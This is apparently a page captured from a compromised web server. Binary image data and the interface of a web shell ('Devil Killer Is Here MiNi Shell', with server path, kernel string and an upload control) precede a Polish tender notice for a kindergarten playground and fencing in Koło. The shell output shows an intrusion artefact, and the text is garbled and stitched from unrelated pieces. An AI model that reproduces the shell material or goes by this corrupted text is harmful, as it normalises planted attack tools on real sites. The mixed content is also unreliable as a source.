JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150417/87872-N-2015.html

<p class="kh_header"><b>Koło: BUDOWA PRZEDSZKOLA MIEJSKIEGO 
ETAP III-INFRASTRUKTURA PRZY PRZEDSZKOLU NA UL. PIASKI W KOLE- WYKONANIE PLACU ZABAW, OGRODZENIA WEWNĘTRZNEGO I ZEWNETRZNEGO</b><br>
<b>Numer ogłoszenia: 87872 - 2015; data zamieszczenia: 17.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Koło , ul. Mickiewicza 12, 62-600 Koło, woj. wielkopolskie, tel. 063 2610252, 2610230, faks 063 2722984.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kolo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA PRZEDSZKOLA MIEJSKIEGO 
ETAP III-INFRASTRUKTURA PRZY PRZEDSZKOLU NA UL. PIASKI W KOLE- WYKONANIE PLACU ZABAW, OGRODZENIA WEWNĘTRZNEGO I ZEWNETRZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie placu zabaw, ogrodzenia wewnętrznego i zewnętrznego. Zakres zamówienia podzielono na dwa oddzielne zadania. Wykonawca może złożyć ofertę na jedno z wybranych zadań lub na oba.
I. Zadanie I - wykonanie placu zabaw i ogrodzenia wewnętrznego.
1) Oczyszczenie terenu, wykonanie odwodnienia i przygotowanie podbudowy pod plac zabaw o nawierzchni syntetycznej pod urządzenia zabawowe i miejsce do ćwiczeń i gier zespołowych.
2) Wykonanie nawierzchni bezpiecznej - część placu zabaw na której będą umieszczone urządzenia zabawowe.
3) Wykonanie nawierzchni - część placu zabaw przeznaczona do ćwiczeń i gier zespołowych.
4) Wykonanie ogrodzenia placu zabaw - część placu zabaw na której będą umieszczone urządzenia zabawowe.
5) Wykonanie ogrodzenia placu zabaw - część placu zabaw przeznaczona do ćwiczeń i gier zespołowych.
6) Wykonanie terenów zielonych.
7) Wykonanie piaskownic.
8) Dostawa i montaż urządzeń zabawowych 
DANE OGÓLNE PRZEDMIOTU ZAMÓWIENIA: 
W ramach przedmiotu zamówienia należy wykonać następujący zakres robót:
1. Oczyszczenie terenu, wykonanie odwodnienia i przygotowanie podbudowy pod plac zabaw o nawierzchni syntetycznej pod urządzenia zabawowe i miejsce do ćwiczeń i gier zespołowych.
1) Usunięcie gruzu, humusu i korytowanie.
2) Wykonanie kolektora kanalizacji deszczowej fi 200 mm na długości 36,0 m z rury PCW SN8.
3) Wykonanie studzienki kanalizacji deszczowej z odstojnikiem z PCW fi 425 - 1 szt. 
4) Wykonanie drenażu francuskiego odwadniającego płytę placu zabaw o nawierzchni syntetycznej z zastosowaniem geowłókniny nietkanej - igłowanej separacyjnej, przepuszczalnej dla wody o gramaturze 200g/m2 na długości 39,0 m i przekroju 40x60 cm wypełnionego kruszywem kamiennym 31,5-63 mm.
5) Profilowanie i zagęszczanie istniejącego podłoża, wykonanie warstwy odsączającej z piasku grubego o gr. 10 cm z umieszczeniem na tej warstwie w celu odwodnienia geowłókniny nietkanej - igłowanej separacyjnej, przepuszczalnej dla wody o gramaturze 200g/m2.
6) Wykonanie warstwy dolnej podbudowy klińcowej z kruszywa kamiennego łamanego zwykłego o uziarnieniu 4 - 32 mm o gr. 15 cm.
7) Wykonanie warstwy górnej podbudowy klińcowej z kruszywa kamiennego łamanego zwykłego o uziarnieniu 1 - 4 mm o gr. 5 cm.
8) Wykonanie obrzeży placu zabaw z obrzeży 30x8 cm na ławach betonowych z betonu B20 o wymiarach 15x30 cm. 
9) Na wierzchu obrzeży zostanie wykonana górna warstwa wystająca nad teren jako wylewana z granulatu EPDM o odpowiedniej elastyczności o gr. 14 mm.
2.Wykonanie nawierzchni bezpiecznej - część placu zabaw na której będą umieszczone urządzenia zabawowe.
1) Wykonanie nawierzchni syntetycznej, przepuszczalnej, bezpiecznej (piankowej, gumowej) do stosowania na zewnątrz (zgodnie z normą PN-EN 1176-1/2009 oraz PN-EN 1177/2009) do umieszczenia na niej elementów urządzeń do ćwiczeń ruchowych w kolorach tieforange RAL2011 PANTONE 152 C (pole 375,65 m2). Nawierzchnia zostanie wykonana jako nawierzchnia syntetyczna wylewana, z granulatu gumowego SBR, z wierzchnią warstwą z EPDM.
2) Zastosowana nawierzchnia musi być zgodna z normą PN-EN 1177, ISO 9001:2001, ISO 14001 oraz posiadać udokumentowane wyniki badań oraz atesty potwierdzające brak szkodliwości podłoża dla użytkowników. Wykonawca powinien okazać kartę techniczną produktu potwierdzającą parametry nawierzchni. Nawierzchnia musi być odporna na działanie warunków atmosferycznych oraz na ścieranie. Powierzchnia nawierzchni ma zapobiegać poślizgnięciom. Wykonawstwo nawierzchni prowadzić zgodnie z instrukcją producenta. Grubość nawierzchni należy dostosować do maksymalnej wysokości upadku z urządzenia, pod którym się ta nawierzchnia znajduje. W związku z tym wykonawca nawierzchni musi dysponować badaniami dotyczącymi krytycznej wysokości upadku wg normy PN-EN 1177. Grubość nawierzchni bezpiecznej na całej powierzchni placu musi być dostosowana do maksymalnego upadku z wysokości HIC = 1,5 m. 
3. Wykonanie nawierzchni - część placu zabaw przeznaczona do ćwiczeń i gier zespołowych. Nawierzchnia syntetyczna poliuretanowa wykonana w technologii układania EPDM, gładka przepuszczalna dla wody, wykonana dwuwarstwowo (pole 332,35 m2).
Nawierzchnia musi spełniać następujące parametry: 
1) Warstwa nośna dolna przepuszczalna dla wody o grubości 35 mm o parametrach technicznych nie gorszych niż parametry systemu Conipur ET. Warstwa syntetyczna będąca mieszanką granulatu gumowego, kompozytu poliuretanowego oraz grysu kwarcowego, będąca podkładem elastycznym.
2) Warstwy wierzchnie syntetyczne poliuretanowe z barwnego drobnego granulatu gumowego przeznaczone do gier zespołowych: dolna warstwa z granulatu SBR o grubości min. 11 mm, górna warstwa wykonana z natrysku kolorowego granulatu EPDM o grubości minimum 3 mm. Grubość warstw wierzchnich minimum 14 mm. Nawierzchnia przepuszczalna dla wody. Kolor ceglasty RAL 5012 z liniami malowanymi. Nawierzchnia o parametrach technicznych nie gorszych niż zespoinowana elastyczna mata z barwnego granulatu Conipur EPDM wymieszanego z dwuskładnikowym systemem poliuretanowym o gr. 14 mm. o parametrach technicznych nie gorszych lub równych:
a) Grubość warstwy 14 mm,
b) Kolor ceglasty z liniami,
c) Wytrzymałość na rozciąganie >= 0,40 MPa,
d) Wydłużenie względne przy rozciąganiu >=35%,
e) Wytrzymałość na rozdzieranie >=100 N,
f) Twardość jednostki Shorea - od 50 do 65 SH.A,
g) Współczynnik tarcia kinetycznego powierzchni w stanie suchym >= 0,35,
h) Odporność na uderzenie: - powierzchnia odcisku kulki <= 750 mm2,
i) Wygląd powierzchni po badaniu - bez zmian.
3) Na nawierzchni części placu zabaw przeznaczonej do ćwiczeń i gier zespołowych zostaną pomalowane linie o szerokości 5 cm wyznaczające pola gry.
4.Wykonanie ogrodzenia placu zabaw, część placu zabaw na której będą umieszczone urządzenia zabawowe. Wygrodzenie terenu placu zabaw dla dzieci wykonane z ogrodzenia systemowego z siatkowych paneli ogrodzeniowych ocynkowanych i polimeryzowanych w kolorze zielonym o wysokości 1,20 m otoczone na zewnątrz ogrodzenia prefabrykowanym cokołem z obrzeży 30x8 oraz trzech furtek wejściowych i dwóch bram wjazdowych. Konstrukcja musi być wykonana bez żadnych ostrych krawędzi i elementów niebezpiecznych dla dzieci, ocynkowana i malowana proszkowo w kolorze RAL 6005 (zielony). Dodatkowo należy uwzględnić zabezpieczenie góry pionowych prętów paneli poziomym zgrzanym do nich fabrycznie poziomo L 30x30x4 mm lub prętem fi 5 mm, które także będą ocynkowane i polimeryzowane. Panele zostaną wykonane z prętów stalowych fi 5 mm o oczkach 5x20 cm. Panele będą posiadały trzy przetłoczenia na wysokości. Panele do słupków wykonanych z profili prostokątnych zamkniętych 40x60x3 mm będą mocowane wyłącznie za pomocą metalowych ścisków prętów i obejm. Rozstaw słupków co około 2,40 m. Fundamenty pod słupki o wymiarach 30x30x80 cm i ławy pod cokolik z obrzeży 30x8 cm o wymiarach 30x15 cm z betonu B20. W ogrodzeniu zostaną zamontowane trzy furtki o szerokości w świetle 1,2 m i dwie bramy o szerokości w świetle 4,0 m w postaci ramek wykonanych z profili metalowych prostokątnych zamkniętych w których zostaną zamocowane panele siatkowe jak w ogrodzeniu. Furtki i bramy kompletne z metalowymi klamkami i zamkami. Słupki przyfurtkowe z profili 80x80x3, przybramowe z profili 120x120x4. Wszystkie zabezpieczone od góry przed opadami i zabetonowane w środku. Wszystkie słupki, bramy i furtki ocynkowane i malowane proszkowo. 
5. Wykonanie ogrodzenia placu zabaw, część placu zabaw przeznaczona do ćwiczeń i gier zespołowych. Wygrodzenie części placu zabaw dla dzieci przeznaczonej do ćwiczeń i gier zespołowych ogrodzeniem wysokości min. 3,10 m z siatki stalowej ocynkowanej powlekanej o oczkach 40x40 mm pokrytej PCV w kolorze zielonym na słupkach stalowych z kształtowników zamkniętych kwadratowych 60x60x4 mm mocowanych w fundamentach betonowych 30x30x100 cm z betonu B-20 o rozstawie co 2,50 m. Słupki na wysokości 3,1 m zostaną zwieńczone porzeczką z profilu 60x30x4  biegnącą po całej długości obwodu ogrodzenia do której także będzie mocowana siatka. W ogrodzeniu zostanie zamontowanych 10 zastrzałów pomiędzy słupkami w polach skrajnych i przy bramie, każdy zastrzał o długości około 3,8 m z profilu 60x60x4 mm. Na całej wysokości siatki zostaną rozmieszczone poziomo w rozstawie co 50 cm napinające pręty stalowe ocynkowane polimeryzowane. Stalowe pręty napinające do słupków będą montowane wyłącznie za pomocą metalowych ścisków prętów i obejm. W ogrodzeniu zostaną zamontowane trzy furtki o szerokości w świetle 1,2 m i jedna brama o szerokości w świetle 2,5 m w postaci ramek wykonanych z profili metalowych prostokątnych zamkniętych w których zostaną zamocowane zgrzewane panele siatkowe. Furtki i bramy kompletne z metalowymi klamkami i zamkami. Słupki przyfurtkowe i przybramowe z profili 120x120x4. Wszystkie słupki, poprzeczki i zastrzały jak i pozostałe elementy metalowe ogrodzenia zabezpieczone zaślepkami przez przedostawaniem wody z opadów do ich wnętrza oraz ocynkowane i malowane proszkowo. Ogrodzenie biegnące po nawierzchni trawiastej otoczone na zewnątrz prefabrykowanym cokołem z obrzeży 30x8 cm na fundamencie o wymiarach 15x30 z betonu B-20.
6. Wykonanie terenów zielonych. Oczyszczenie terenu z resztek gruzu i betonu oraz 15 cm grubości warstwy gruntu, nasypu niebudowlanego. Wyrównanie i wyprofilowanie terenu. Ułożenie warstwy humusu o grubości 15 cm. Obsianie mieszanką traw sportowych przeznaczonych do intensywnego użytkowania. Wykonanie nawożenia nawozem azotowym w ilości 50 kg.
7. Wykonanie piaskownic. Trzy piaskownice o wymiarach w rzucie w świetle pola zabaw 3,0 x4,5 m. Ściany piaskownic betonowe o grubości 20 cm. z betonu B20 zagłębione w gruncie na 80 cm i wystające ponad grunt na wysokość 20 cm, zbrojone wieńcem obwodowym z 4 prętów fi10 34GS, strzemiona fi6 34GS o oczkach 10x25 cm co 20 cm. Wierzch dna piaskownicy wybetonowanego warstwą betonu B20 o gr. 10 cm znajduje się 70 cm poniżej wierzchu ściany betonowej. Piaskownica wypełniona warstwą piasku średniego o wysokości 50 cm. Siedzisko wykonane z desek o wymiarach 28x4,5 cm zabezpieczonych impregnacją wgłębną i malowanych farbą olejną przykręcane poprzez folię izolacyjną gr. 1,0 mm do wierzchu betonowych ścian. Ściany piaskownicy z obu stron otynkowane tynkiem cementowym kat. III lub zatarte na gładko. Impregnaty i farby z atestami higienicznymi dopuszczającymi do stosowania w obiektach użyteczności publicznej. 
8. Dostawa i montaż urządzeń zabawowych. Zakres robót obejmuje dostawę i montaż następujących urządzeń zabawowych wykonanych z profili stalowych okrągłych ocynkowanych i malowanych proszkowo oraz elementów małej architektury:
1) Duży domek zabawowy - 2 szt. przeznaczony na publiczne place zabaw wraz z wykonaniem fundamentów z betonu B20. Domek zabawowy zbudowany z jednej wieży z daszkiem dwuspadowym, dwóch podestów kwadratowych i podestu okrągłego, gry w kółko i krzyżyk oraz dwóch poziomych ćwierć okrągłych tablic z numerami  umieszczonymi w narożach np. produkt Buglo nr 7009 lub równoważny o następujących parametrach:
a) Wymiary: 174x160 cm.
b) Strefa bezpieczeństwa: 474x460 cm.
c) Wysokość całkowita: 171 cm.
d) Wysokość podestu: 10 cm.
e) Wysokość swobodnego upadku: 10 cm.
f) Dostępność części zapasowych: tak.
g) Produkt zgodny z PN-EN 1176-1:2009: tak.
h) Przedział wiekowy: 1 - 8 lat.
i) Konstrukcja: stal nierdzewna.
j) Elementy malowane: cynkowanie i malowanie proszkowe.
k) Ścianki: płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych w różnych kolorach.
l) Śruby: Wszelkie śruby i mocowania nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
m) Kotwienie: zakotwione: 80 cm w gruncie. 
W kalkulacji uwzględnić wykonanie fundamentów pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopy fundamentowe zostaną wykonane o wymiarach nie mniejszych niż dla każdej stopy w rzucie poziomym 0,40x0,40 m i głębokości 0,80 m.
2) Zjeżdżalnia - 2 szt. przeznaczona na publiczne place zabaw wraz z wykonaniem fundamentów z betonu B20. Zjeżdżalnia zabawowa zbudowana z jednej wieży z daszkiem dwuspadowym, jednego ześlizgu oraz jednego wejścia w postaci rampy ze schodkami i poręczami z obu stron np. produkt Buglo nr 2012-MOD-513042 lub równoważny o następujących parametrach:
a) Wymiary: 100x312 cm
b) Strefa bezpieczeństwa: 400x662 cm.
c) Wysokość całkowita: 281 cm.
d) Wysokość podestu: 90 cm.
e) Wysokość swobodnego upadku: 90 cm.
f) Dostępność części zapasowych: tak.
g) Produkt zgodny z PN-EN 1176-1:2009: tak.
h) Przedział wiekowy: 3 - 12 lat.
i) Konstrukcja: stal (rury 88.9, 42.4, 33.7 mm) cynkowana i malowana proszkowo.
j) Ślizg: stal nierdzewna.
k) Ścianki: płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych w różnych kolorach.
l) Podest: płyta antypoślizgowa, wodoodporna.
m) Śruby: Wszelkie śruby i mocowania nierdzewne, w plastikowych zaślepkach.
n) Kotwienie: zakotwione: 80 cm w gruncie. 
W kalkulacji uwzględnić wykonanie fundamentów pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopy fundamentowe zostaną wykonane o wymiarach nie mniejszych niż dla każdej stopy w rzucie poziomym 0,40x0,40 m i głębokości 0,80 m.
3) Bujak konik na sprężynie - 2 szt. przeznaczony na publiczne place zabaw wraz z wykonaniem fundamentów z betonu B20. Bujak zabawowy przeznaczony dla jednej osoby zbudowany z jednej sprężyny i siedziska w postaci konika np. produkt Buglo nr 5011 lub równoważny o następujących parametrach:
a) Wymiary: 27x96 cm.
b) Strefa bezpieczeństwa: 327x396 cm.
c) Wysokość całkowita: 83 cm.
d) Wysokość swobodnego upadku: 50 cm.
e) Dostępność części zapasowych: tak.
f) Produkt zgodny z PN-EN 1176-1:2009: tak.
g) Przedział wiekowy: 1 - 12 lat.
h) Konstrukcja: stal sprężynowa 20 mm.
i) Elementy metalowe: cynkowane i malowane proszkowo.
j) Atrapa konika i siedzisko: płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych w różnych kolorach.
k)Śruby: Wszelkie śruby i mocowania nierdzewne, w plastikowych zaślepkach.
l) Kotwienie: zakotwione: 80 cm w gruncie. 
W kalkulacji uwzględnić wykonanie fundamentu pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopa fundamentowa zostanie wykonane o wymiarach nie mniejszych niż w rzucie poziomym 0,50x0,50 m i głębokości 0,80 m.
4) Pomost wiszący - 2 szt. urządzenie przeznaczone na publiczne place zabaw wraz z wykonaniem fundamentów z betonu B20. Pomost zbudowany z metalowej konstrukcji nośnej w postaci 4 słupków, wewnątrz której umieszczono wygiętą ku dołowi kładkę wykonaną z desek mocowanych na stałe do wygiętych pałąków z rur metalowych. Na kładkę z obu stron prowadzą wejścia wykonane jako pochyłe podesty wykonane z desek mocowanych na stałe do ukośnie ułożonych bele wsporczych z rur metalowych. Mostek jak i podesty wyposażone w obustronne poręcze wykonane z rur stalowych np. produkt Croquet pomost wiszący z drewna 2 nr GT-0025/1 w wersji ze wszystkimi słupkami i belkami nośnymi wykonanymi w konstrukcji metalowej lub równoważny o następujących parametrach:
a) Wymiary: 3,80x1,00 m.
b) Strefa bezpieczeństwa: 6,80x4,00 m.
c) Wysokość całkowita: 1,40 m.
d) Wysokość swobodnego upadku: 0,55 m.
e) Dostępność części zapasowych: tak.
f) Produkt zgodny z PN-EN 1176-1:2009: tak.
g) Przedział wiekowy: 1 - 12 lat.
h) Konstrukcja: stal rury okrągłe.
i) Elementy metalowe: cynkowane i malowane proszkowo.
j) Słupy nośne zakończone zaokrągleniem wykonanym z tworzywa o promieniu 50 mm.
k) Pomost z drewna - konstrukcja wzmocniona jeklami stalowymi do których przymocowane są deski impregnowane ciśnieniowo tworzące podłogę pomostu.
l) Śruby: Wszelkie śruby i mocowania nierdzewne i/lub w plastikowych zaślepkach.
m) Kotwienie: zakotwione: 80 cm w gruncie. 
W kalkulacji uwzględnić wykonanie fundamentu pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopy fundamentowe zostaną wykonane o wymiarach nie mniejszych niż w rzucie poziomym 0,30x0,30 m i głębokości 0,80 m.
5) Pociąg zabawka - 1 szt. urządzenie przeznaczone na publiczne place zabaw wraz z wykonaniem fundamentów z betonu B20. Pociąg składa się z lokomotywy i trzech wagoników. Zbudowany w konstrukcji drewnianej, różne części pociągu malowane w różne kolory. W każdym wagoniku może usiąść 8 dzieci a w lokomotywie dwoje (razem 26) np. produkt Croquet pociąg Monika nr GT-4009 plus dodatkowy jeden wagonik B nr GT-4003 lub równoważny o następujących parametrach:
a) Wymiary: 10,20x1,20 m. (1,20 m lokomotywa, 1,00 m wagoniki)
b) Strefa bezpieczeństwa: 13,20x4,20 m.
c) Wysokość całkowita: 1,95 m.
d) Wysokość swobodnego upadku: 0,60 m.
e) Dostępność części zapasowych: tak.
f) Produkt zgodny z PN-EN 1176-1:2009: tak.
g) Przedział wiekowy: 1 - 12 lat.
h) Konstrukcja: słupy nośne oraz belki poziome o przekroju okrągłym i średnicy 100 i 60 mm, wykonane z drewna bezrdzeniowego (litego) powlekanego wielowarstwowo preparatami chroniącymi przed pękaniem, zwietrzeniem, pleśnią.
i) Słupy nośne zakończone zaokrągleniem o promieniu 50 mm.
j) Podesty wykonane z desek ryflowanych, wmontowanych w podfrezowane zagłębienia poziomych belek stanowiących elementy konstrukcyjne.
k) Dach na konstrukcji drewnianej pokryty deskami impregnowanymi.
l) Deski podestów, siedzisk, impregnowane ciśnieniowo.
m) Dach wagonu stanowi ochronę przeciwsłoneczną, nie jest zabezpieczeniem przeciwdeszczowym.
n) Śruby: Wszelkie śruby i mocowania nierdzewne i/lub w plastikowych zaślepkach.
o) Kotwienie: zakotwione: 80 cm w gruncie. 
W kalkulacji uwzględnić wykonanie fundamentu pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopy fundamentowe zostaną wykonane o wymiarach nie mniejszych niż w rzucie poziomym 0,30x0,30 m i głębokości 0,80 m.
6) Tablica do rysowania - 6 szt. przeznaczona na publiczne place zabaw wraz z wykonaniem fundamentów z betonu B20. Tablica do rysowania w postaci płaszczyzn umieszczonych w stosunku do siebie i do terenu pod kątem prostym, przystosowanych do rysowania po nich kredą oraz dodatkowo wyposażonych w elementy ozdobne - cyferki, znaczki, kształty np. produkt Buglo nr 2021 lub równoważny o następujących parametrach:
a) Wymiary: 131x133 cm.
b) Wysokość całkowita: 140 cm.
c) Dostępność części zapasowych: tak.
d) Produkt zgodny z PN-EN 1176-1:2009: tak.
e) Przedział wiekowy: 1 - 12 lat.
f) Konstrukcja: stal ocynkowana i malowana dwukrotnie proszkowo.
g) Tablica: płyta wodoodporna w kolorze czarnym.
h) Śruby: Wszelkie śruby i mocowania nierdzewne.
i) Kotwienie: zakotwiona 80 cm w gruncie. 
W kalkulacji uwzględnić wykonanie fundamentu pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopy fundamentowe zostaną wykonane o wymiarach nie mniejszych niż w rzucie poziomym 0,30x0,30 m i głębokości 0,80 m.
7) Kosz na śmieci- 2 szt. wraz z wykonaniem fundamentów z betonu B20. Kosz wykonany z zadaszeniem przeciwdeszczowym, fundamentowany w gruncie, pozbawiony ostrych krawędzi i szczelin niebezpiecznych dla dzieci, przekręcany na śrubach w celu wysypania śmieci np. produkt Buglo nr 6052 lub równoważny o następujących parametrach:
a) Wysokość całkowita: 100 cm.
b) Pojemność: 35 l.
c) Konstrukcja: stal ocynkowana i malowana proszkowo.
d) Śruby: Wszelkie śruby i mocowania nierdzewne.
e) Kotwienie: zakotwione: 80 cm w gruncie.
W kalkulacji uwzględnić wykonanie fundamentu pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopa fundamentowa zostanie wykonane o wymiarach nie mniejszych niż w rzucie poziomym 0,40x0,25 m i głębokości 0,80 m.
8) Tablica regulaminowa - 1 szt. wraz z wykonaniem fundamentów z betonu B20 + tabliczki informacyjne. Tablica informacyjna położona przy wejściu na plac zabaw o nawierzchni syntetycznej z regulaminem i oznaczeniami graficznymi wg wzoru określonego przez MEN, fundamentowana w gruncie. Ponadto na tablicy powinien się znaleźć numer dyrektora przedszkola lub osoby przez niego upoważnionej do sprawowania nadzoru nad placem zabaw oraz numery telefonów alarmowych. Treść informacji powinna zostać uzgodniona z Inwestorem np. produkt Buglo nr 6052 lub równoważny o następujących parametrach:
a) Wysokość całkowita: 200 cm.
b) Wymiary: 68x5 cm.
c) Konstrukcja: stal ocynkowana i malowana proszkowo.
d) Śruby: Wszelkie śruby i mocowania nierdzewne.
e) Tablica: blacha ocynkowana.
f) Kotwienie: zakotwione: 80 cm w gruncie.
W kalkulacji uwzględnić wykonanie fundamentu pod urządzenie zabawowe zgodnie z zaleceniami producenta, jednakże stopy fundamentowe zostaną wykonane o wymiarach nie mniejszych niż w rzucie poziomym 0,30x0,30 m i głębokości 0,80 m.
9.Wszystkie urządzenia do zabawy muszą spełniać warunki zawarte w normie PN-EN1176-1 Wyposażenie placów zabaw. Ogólne wymagania bezpieczeństwa i metody badań. Wszystkie muszą posiadać certyfikat bezpieczeństwa za wyjątkiem wykonywanych jako modyfikacje typowych tj. zjeżdżalni nr 2 i pomostu wiszącego nr 4. Urządzenia zabawowe powinny posiadać pięcioletni okres gwarancji, powinny być wykonane z bezpiecznych i trwałych materiałów, powinny być zgodne z Polskimi Normami oraz warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach.
II. Zadanie II - wykonanie ogrodzenia zewnętrznego całego obiektu.
1. Demontaż istniejącego ogrodzenia.
2. Wykonanie betonowych cokołów ogrodzeniowych.
3. Montaż ogrodzenia z siatkowych paneli ogrodzeniowych.
4. Montaż trzech bram przesuwnych w ogrodzeniu.
5. Montaż trzech furtek w ogrodzeniu. 
